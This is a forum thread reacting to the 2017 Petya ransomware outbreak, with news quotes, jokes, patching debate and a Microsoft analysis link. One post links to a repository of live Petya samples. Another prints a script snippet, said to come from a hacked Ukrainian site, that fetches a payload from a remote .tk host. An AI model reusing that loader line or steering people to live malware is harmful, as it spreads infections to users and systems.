BREAKING: Multiple cyberattacks reported worldwide

stepladder

BBC News wrote:

A "powerful" ransomware cyberattack that started in Ukraine is rapidly spreading across the world and causing chaos, hitting banks, government IT systems and energy firms.

British advertising group WPP said its computer networks in several locations had been targeted.

The UK's National Cyber Security Centre is investigating how many more UK firms have been hit and is "trying to get an understanding of a fast-moving situation".

Companies in six other countries were also hit, after Ukraine declared it had been struck by the biggest cyberattack in its history.

The virus has been identified as 'Petrwrap', a modified version of the WannaCry ransomware that hit the NHS and other companies in May.

Maersk Line said that all it's computer systems in the UK and Ireland were down.

There are as yet unconfirmed reports that some Irish computers have also been hit.

What are your thoughts on all this?

Folks, just a warning, stay safe online. You could be hit by this new ransomware attack. Beware.

Roger Hassenforder

FFS Vlad, cop on

KungPao

For more information and tips on how to prevent this attack, just click here >> http://bit.ly/2tS9scV

Atlantic Dawn

Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

ScumLord

We need to bomb that cyberstan back to the stone age.

Guy:Incognito

stepladder wrote: »

What are your thoughts on all this?

That the people who do these things are ****ing arseholes and no better than any other criminals.

Fathom

Run virtual OS. Stay updated. Hide behind DMZ. Life's game play. Have fun!

SEPT 23 1989

I presume the virus has spread to the ships and they are now out if control heading for the major coastal cities of the world

ElChe32

Friend of mine in Madrid works for a company that was hit big time by the attack today. She's delighted she got let home early.

PeterTheNinth

Atlantic Dawn wrote: »

Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

You sure about that AD. I'm worried about somebody clicking something in one of our customers. Wondering if we should pull the sites offline altogether.

murpho999

Nothing wrong with my compu

the_syco

KungPao wrote: »

For more information and tips on how to prevent this attack, just click here >> http://bit.ly/2tS9scV

Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!

Atlantic Dawn

Atlantic Dawn wrote: »

Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

In fairness many people have no option but to run XP, we have equipment in work that will only run with XP as there is no software compatible with anything newer so we have to keep some machines running XP.

Atlantic Dawn

Atlantic Dawn wrote: »

Is it the usual where gobsheites who are still running Windows XP or have not updated security patches for months are hit?

These are exploits developed by the US government we're dealing with here. There are definitely things that will get a fully updated machine.

PeterTheNinth

My radio was taken over by ransomware a few years ago. Ryan Tubridy 1Million Euro in BitCoin, Joe Duffy 400K in Bit Coin, Marion Finucane 500K in BitCoin.

SEPT 23 1989

SEPT 23 1989 wrote: »

I presume the virus has spread to the ships and they are now out if control heading for the major coastal cities of the world

Roland Emmerich already sweating over the rights

Skylinehead

Ace Faithful Lace wrote: »

In fairness many people have no option but to run XP, we have equipment in work that will only run with XP as there is no software compatible with anything newer so we have to keep some machines running XP.

Then your equipment needs updating. XP is an outdated, insecure, unsupported OS and if your business gets attacked as a result, can't blame anyone else!

gctest50

the_syco wrote: »

Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!

based on petya no ?

obviously don't put click "run" - passworded anyways

https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


.

Arbitrary

the_syco wrote: »

Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!

http://redirectdetective.com/

Meeeee79

the_syco wrote: »

Do you have the direct link? Not clicking random bit.ly link on a thread about ransomware!

I think the irony has been lost on your here...........

BorneTobyWilde

I found a signal hidden inside out own satellite system, and the clock is ticking .

Skylinehead

Skylinehead wrote: »

Then your equipment needs updating. XP is an outdated, insecure, unsupported OS and if your business gets attacked as a result, can't blame anyone else!

Its custom equipment that in some cases cannot be replaced or updated (company closed down for example), where the company don't offer updates or it would cost vast amounts of money to update.

Some stuff is so custom there is simply no way to update it no matter how much you wanted to.

KungPao

gctest50 wrote: »

based on petya no ?

obviously don't put click "run" - passworded anyways

https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


.

wes

Well, that explains why the lads in the office were talking about cyber attacks earlier. Was busy finishing off some performance scripts.

I guess these thing will start getting more and more common. Will take a look at Krebs on Security, as he is good for a little more technical info, when he get around to covering this.

**EDIT**
Read on the UK independent that this is due to a smb vulnerability. Surely not the same one as last time? If that is the case, then some seriously stupid companies out there for not fixing it, after the last time.

UK National Cyber Security Centre says it is 'aware of global ransomware incident'

--SNIP--
The Swiss government’s Reporting and Analysis Centre said the Petya virus was believed to be responsible and was spreading by “exploiting the SMB (Server Message Block) vulnerabilityâ€.
--SNIP--

AudreyHepburn

I'm entirely surprised tbh....these guys are always one step ahead.

That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.

AudreyHepburn

AudreyHepburn wrote: »

I'm entirely surprised tbh....these guys are always one step ahead.

That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.

It's US government code that was leaked and has been adapted.

Fr_Dougal

gctest50 wrote: »

based on petya no ?

obviously don't put click "run" - passworded anyways

https://github.com/ytisf/theZoo/tree/master/malwares/Binaries/Ransomware.Petya




Please remember that these are live and dangerous malware! They come encrypted and locked for a reason! Do NOT run them unless you are absolutely sure of what you are doing! They are to be used only for educational purposes (and we mean that!) !!!

We recommend running them in a VM which has no internet connection (or an internal virtual network if you must) and without guest additions or any equivalents. Some of them are worms and will automatically try to spread out. Running them unconstrained means that you will infect yourself or others with vicious and dangerous malware!!!


.

scopper

To be fair the money in ransomware means someone was going to try again. By the end of the year this will be so normal it won't make the news.

gctest50

Deleted User wrote: »

It's US government code that was leaked and has been adapted.

To encrypt your stuff the older one uses :

https://en.wikipedia.org/wiki/Salsa20

by :

Daniel Julius Bernstein , Bernstein addressed cryptography by suing the United States Government in 1995 Bernstein v. United States and by writing secure software for email, web, and DNS

Ol' Donie

It better not be that thing that wrecked boards for a few days again.

That was rubbish.

ED E

Ace Faithful Lace wrote: »

Its custom equipment that in some cases cannot be replaced or updated (company closed down for example), where the company don't offer updates or it would cost vast amounts of money to update.

Some stuff is so custom there is simply no way to update it no matter how much you wanted to.

Thats why you airgap it. Then worms arent a problem.

wes wrote: »

Well, that explains why the lads in the office were talking about cyber attacks earlier. Was busy finishing off some performance scripts.

I guess these thing will start getting more and more common. Will take a look at Krebs on Security, as he is good for a little more technical info, when he get around to covering this.

**EDIT**
Read on the UK independent that this is due to a smb vulnerability. Surely not the same one as last time? If that is the case, then some seriously stupid companies out there for not fixing it, after the last time.

Downgrade attacks are the problem. SMB v2/3 have significantly better security but you can trick any machine into falling back to v1 which is horribly out of date. MS have to kill support for it but havent yet as its gonna break a load of old machines.

gctest50

gctest50 wrote: »

To encrypt your stuff the older one uses :

https://en.wikipedia.org/wiki/Salsa20

by :

Daniel Julius Bernstein , Bernstein addressed cryptography by suing the United States Government in 1995 Bernstein v. United States and by writing secure software for email, web, and DNS

I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.

Dravokivich

AudreyHepburn wrote: »

I'm entirely surprised tbh....these guys are always one step ahead.

That they could infiltrate Chernobyl's radiation monitoring equipment is scary though.

"Infiltrate" is the wrong way to describe it. No specific organisations are being targeted.

sammyjo90

Its hit the company i work for. Home early today and just been told that for now..there is no work tomorrow! Untill i wake up to a text saying i have to come in that is

BillyBobBS

Eh it's pretty worrying they where able to get into a nuclear power stations systems.

dr.bollocko

BillyBobBS wrote: »

Eh it's pretty worrying they where able to get into a nuclear power stations systems.

If this creates a disaster that kills us all I'm glad that it happened on a Tuesday. At least it won't **** up the weekend.

mad muffin

I was driving when I heard something about it on the radio. All I got was something about Deutsche Post being hit, and I was like… NOOOOOOOO!!!!

As only today I ordered something from Germany that's being delivered via Deutsche Post. I was like FML :mad:


Quick google when I got home revealed it was only the express division of the Ukraine arm of DHL.

PHEW

Carry on :pac:

gw80

Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,

Fr_Dougal

gw80 wrote: »

Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,

Might do, you had better uninstall grinder, just to be safe.

Outlaw Pete

Yeah I noticed earlier when I was typing tha........ Allāhu akbar!! Death to America!!

Yourself isit

gw80 wrote: »

Will this have an effect on my welder and my grinder in work tomorrow,? my welder is pretty fancy, its got lights and digital numbers en everything,

Not if you upgraded to iOS 12.1 XP linuxvista. Pm me if stuck.

RobbingBandit

Password:0000 the four 0s are in a different order now that will fool them.

It's great having a Mac and not having to worry about all these Microsoft attacks.

jacksie66

This post has been deleted.

Fr_Dougal

Ace Faithful Lace wrote: »

It's great having a Mac and not having to worry about all these Microsoft attacks.

Mac's aren't immune to cyberattacks. Safe from Windows based attacks alright.

the_syco

Ace Faithful Lace wrote: »

It's great having a Mac and not having to worry about all these Microsoft attacks.

Except from MacRansom; https://nakedsecurity.sophos.com/2017/06/15/more-mac-ransomware-666-and-7-days-to-pay/

Meeeee79

mad muffin wrote: »

I was driving when I heard something about it on the radio. All I got was something about Deutsche Post being hit, and I was like… NOOOOOOOO!!!!

As only today I ordered something from Germany that's being delivered via Deutsche Post. I was like FML :mad:


Quick google when I got home revealed it was only the express division of the Ukraine arm of DHL.

PHEW

Carry on :pac:

I think the situation is a little more serious than the status of your delivery

pickarooney

Fathom wrote: »

Run virtual OS. Stay updated. Hide behind DMZ. Life's game play. Have fun!

Hide behind DMZ? How does that work?

gctest50

Deleted User wrote: »

I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.

Maybe through hacked websites too

this Ukrainian website

ht***p://bahmut.com.ua

has this buried in it :

var REMOTE_URL = 'http://dfkiueswbgfreiwfsd.tk/i/'

execute_request(traffic, REMOTE_URL, apply_payload);

probably not free kitten pics ? dunno

Reads the active computer name
Reads the cryptographic machine GUID
Parsed Javascript
Reads Windows Trust Settings

Opens the MountPointManager (often used to detect additional infection locations)

Touches files in the Windows directory

Found potential URL in binary/memory

Reads information about supported languages

gctest50

Deleted User wrote: »

I'm talking about the exploit to hack the systems in the first place. WannaCry was an NSA-exploit. Apparently, this one uses the same base as WannaCry.

Hacked update servers :

https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/


Delivery and installation

Initial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc.

Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process.

mad muffin

Meeeee79 wrote: »

I think the situation is a little more serious than the status of your delivery

You may think it… but you would be wrong.